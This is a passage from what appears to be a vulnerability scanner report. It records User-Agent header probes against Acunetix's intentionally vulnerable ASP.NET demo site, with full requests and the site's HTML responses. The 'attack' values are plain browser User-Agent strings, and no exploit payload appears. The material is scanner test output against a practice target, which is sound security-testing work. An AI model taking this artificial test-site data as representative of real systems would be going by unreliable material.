26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Show / hide Request and Response
Request Header - size: 375 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:15 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Show / hide Request and Response
Request Header - size: 387 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:16 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter	Header User-Agent
